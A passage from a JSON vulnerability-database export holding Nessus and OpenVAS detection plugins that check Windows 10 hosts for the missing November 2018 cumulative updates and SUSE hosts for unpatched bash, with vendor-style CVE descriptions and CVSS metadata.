An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of a elevated process. (CVE-2018-8454)\n\n - A spoofing vulnerability exists when Microsoft Edge\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was on a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2018-8564)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n an open source customization for Microsoft Active\n Directory Federation Services (AD FS) does not properly\n sanitize a specially crafted web request to an affected\n AD FS server. An authenticated attacker could exploit\n the vulnerability by sending a specially crafted request\n to an affected AD FS server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run scripts in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the AD FS site\n on behalf of the user, such as change permissions and\n delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that the open source\n customization for AD FS properly sanitizes web requests.\n (CVE-2018-8547)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
(CVE-2018-8562)\n\n - An information disclosure vulnerability exists when\n "Kernel Remote Procedure Call Provider" driver\n improperly initializes objects in memory.\n (CVE-2018-8407)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft RemoteFX Virtual GPU miniport\n driver handles objects in memory. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2018-8471)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8541, CVE-2018-8542,\n CVE-2018-8543, CVE-2018-8551, CVE-2018-8555,\n CVE-2018-8556, CVE-2018-8557, CVE-2018-8588)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Edge does not properly enforce cross-domain\n policies, which could allow an attacker to access\n information from one domain and inject it into another\n domain. 
(CVE-2018-8567)\");\n # https://support.microsoft.com/en-us/help/4467708/windows-10-update-kb4467708\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?23874593\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4467708.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8476\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-11\";\nkbs = make_list('4467708');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"11_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4467708])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:15", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4467708.", "modified": "2019-05-03T00:00:00", "published": "2018-11-14T00:00:00", "id": "OPENVAS:1361412562310814180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814180", "title": "Microsoft Windows Multiple Vulnerabilities (KB4467708)", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4467708)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814180\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8562\", \"CVE-2018-8564\", \"CVE-2018-8256\", \"CVE-2018-8407\",\n \"CVE-2018-8415\", \"CVE-2018-8417\", \"CVE-2018-8454\", \"CVE-2018-8471\",\n \"CVE-2018-8476\", \"CVE-2018-8485\", \"CVE-2018-8541\", \"CVE-2018-8542\",\n \"CVE-2018-8543\", \"CVE-2018-8544\", \"CVE-2018-8545\", \"CVE-2018-8547\",\n \"CVE-2018-8549\", \"CVE-2018-8550\", \"CVE-2018-8551\", \"CVE-2018-8552\",\n \"CVE-2018-8554\", \"CVE-2018-8555\", \"CVE-2018-8556\", \"CVE-2018-8557\",\n \"CVE-2018-8561\", \"CVE-2018-8567\", \"CVE-2018-8584\", \"CVE-2018-8588\",\n \"CVE-2018-8592\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n 
script_tag(name:\"creation_date\", value:\"2018-11-14 17:32:14 +0530 (Wed, 14 Nov 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4467708)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4467708.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists,\n\n - in the way that Microsoft Edge handles cross-origin requests.\n\n - in Windows when the Win32k component fails to properly handle objects in\n memory.\n\n - when an open source customization for Microsoft Active Directory Federation\n Services (AD FS) does not properly sanitize a specially crafted web request to\n an affected AD FS server.\n\n - in the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - A security feature bypass exists when Windows incorrectly validates kernel\n driver signatures.\n\n - when DirectX improperly handles objects in memory.\n\n - when Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - when VBScript improperly discloses the contents of its memory, which could\n provide an attacker with information to further compromise the user's computer\n or data.\n\n - when Microsoft Edge improperly handles specific HTML content.\n\n - in Microsoft JScript that could allow an attacker to bypass Device Guard.\n\n - in PowerShell that could allow an attacker to execute unlogged code.\n\n - when PowerShell improperly handles specially crafted files.\n\n - in the way that Windows Deployment Services TFTP Server handles objects in\n memory.\n\n - in the way that the Microsoft RemoteFX Virtual GPU miniport driver handles\n objects in memory.\n\n - An elevation of privilege exists in Windows COM Aggregate Marshaler.\n\n - when Windows Audio Service fails to properly handle objects in memory.\n\n - when Microsoft Edge does not 
properly enforce cross-domain policies, which\n could allow an attacker to access information from one domain and inject it\n into another domain.\n\n - in the way that the VBScript engine handles objects in memory.\n\n - in Windows 10 version 1809 when installed from physical media (USB, DVD, etc.\n\n - when Kernel Remote Procedure Call Provider driver improperly\n initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions and load improperly signed\n drivers into the kernel, gain the same user rights as the current user, obtain\n information to further compromise the user's system, improperly discloses file\n information, trick a user into believing that the user was on a legitimate website\n and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1809 for 32-bit Systems,\n\n Windows 10 Version 1809 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4467708\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17763.0\", test_version2:\"11.0.17763.133\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17763.0 - 11.0.17763.133\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:15", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4467686", "modified": "2019-05-03T00:00:00", "published": "2018-11-14T00:00:00", "id": "OPENVAS:1361412562310814345", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814345", "title": "Microsoft Windows Multiple Vulnerabilities (KB4467686)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4467686)\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# 
Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814345\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8256\", \"CVE-2018-8407\", \"CVE-2018-8408\", \"CVE-2018-8415\",\n \"CVE-2018-8417\", \"CVE-2018-8450\", \"CVE-2018-8454\", \"CVE-2018-8471\",\n \"CVE-2018-8485\", \"CVE-2018-8542\", \"CVE-2018-8543\", \"CVE-2018-8544\",\n \"CVE-2018-8547\", \"CVE-2018-8555\", \"CVE-2018-8556\", \"CVE-2018-8557\",\n \"CVE-2018-8561\", \"CVE-2018-8562\", \"CVE-2018-8564\", \"CVE-2018-8565\",\n \"CVE-2018-8567\", \"CVE-2018-8584\", \"CVE-2018-8588\", \"CVE-2018-8549\",\n \"CVE-2018-8550\", \"CVE-2018-8551\", \"CVE-2018-8552\", \"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-14 15:00:57 +0530 (Wed, 14 Nov 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4467686)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n 
update according to Microsoft KB4467686\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - PowerShell improperly handles specially crafted files.\n\n - Kernel Remote Procedure Call Provider driver improperly initializes objects in memory.\n\n - Windows kernel improperly initializes objects in memory.\n\n - PowerShell allows an attacker to execute unlogged code.\n\n - Microsoft JScript improperly manages COM object creation.\n\n - Windows Search improperly handles objects in memory.\n\n - Microsoft RemoteFX Virtual GPU miniport driver improperly handles objects in memory.\n\n - DirectX improperly handles objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - VBScript engine improperly handles objects in memory.\n\n - Windows incorrectly validates kernel driver signatures.\n\n - Windows COM Marshaler incorrectly processes interface requests.\n\n - Microsoft Graphics Components improperly handles objects in memory.\n\n - Win32k component fails to properly handle objects in memory.\n\n - Microsoft Edge improperly handles specific HTML content.\n\n - Windows improperly handles calls to ALPC.\n\n - Windows Audio Service fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions and load improperly signed\n drivers into the kernel, gain the same user rights as the current user, obtain\n information to further compromise the user's system, improperly discloses file\n information, trick a user into believing that the user was on a legitimate website\n and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1709 for 32/64-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4467686\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.784\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.784\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft 4467702", "modified": "2019-05-03T00:00:00", "published": "2018-11-14T00:00:00", "id": "OPENVAS:1361412562310814342", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814342", "title": "Microsoft Windows Multiple Vulnerabilities (KB4467702)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4467702)\n#\n# Authors:\n# Vidita V Koushik 
<vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814342\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8256\", \"CVE-2018-8407\", \"CVE-2018-8408\", \"CVE-2018-8415\",\n \"CVE-2018-8417\", \"CVE-2018-8450\", \"CVE-2018-8454\", \"CVE-2018-8471\",\n \"CVE-2018-8476\", \"CVE-2018-8485\", \"CVE-2018-8541\", \"CVE-2018-8542\",\n \"CVE-2018-8543\", \"CVE-2018-8544\", \"CVE-2018-8545\", \"CVE-2018-8547\",\n \"CVE-2018-8554\", \"CVE-2018-8555\", \"CVE-2018-8556\", \"CVE-2018-8557\",\n \"CVE-2018-8561\", \"CVE-2018-8562\", \"CVE-2018-8564\", \"CVE-2018-8567\",\n \"CVE-2018-8584\", \"CVE-2018-8588\", \"CVE-2018-8549\", \"CVE-2018-8550\",\n \"CVE-2018-8551\", \"CVE-2018-8552\", \"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-14 12:56:47 +0530 (Wed, 14 Nov 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities 
(KB4467702)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft 4467702\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - PowerShell improperly handles specially crafted files.\n\n - Kernel Remote Procedure Call Provider driver improperly initializes objects in memory.\n\n - Windows kernel improperly initializes objects in memory.\n\n - PowerShell allows an attacker to execute unlogged code.\n\n - Microsoft JScript improperly manages COM object creation.\n\n - Windows Search improperly handles objects in memory.\n\n - Microsoft RemoteFX Virtual GPU miniport driver improperly handles objects in memory.\n\n - Windows Deployment Services TFTP Server improperly handles objects in memory.\n\n - DirectX improperly handles objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - VBScript engine improperly handles objects in memory.\n\n - open source customization for AD FS improper sanitization of web requests.\n\n - Windows incorrectly validates kernel driver signatures.\n\n - Microsoft Graphics Components improperly handles objects in memory.\n\n - Win32k component fails to properly handle objects in memory.\n\n - Microsoft Edge improperly handles specific HTML content.\n\n - Cross-domain policies are improperly enforced in Microsoft Edge.\n\n - Windows Audio Service incorrectly handles objects in memory.\n\n - Microsoft Edge improperly handles cross-origin requests.\n\n - Windows improperly handles calls to ALPC.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions and load improperly signed\n drivers into the kernel, gain the same user rights as the current user, obtain\n information to further compromise the user's 
system, improperly discloses file\n information, determine the origin of all webpages in the affected browser, access\n information from one domain and inject it into another domain. trick a user into\n believing that the user was on a legitimate website and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1803 for 32/64-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4467702\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.406\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.406\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:40", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-10-16T00:00:00", "id": 
"OPENVAS:1361412562310850890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850890", "title": "SuSE Update for bash SUSE-SU-2014:1259-1 (bash)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1259_1.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# SuSE Update for bash SUSE-SU-2014:1259-1 (bash)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850890\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:37:55 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for bash SUSE-SU-2014:1259-1 (bash)\");\n 
script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1259_1\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7169\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7187\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-6271\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7186\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security 
Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"SLES12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLES12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:31", 
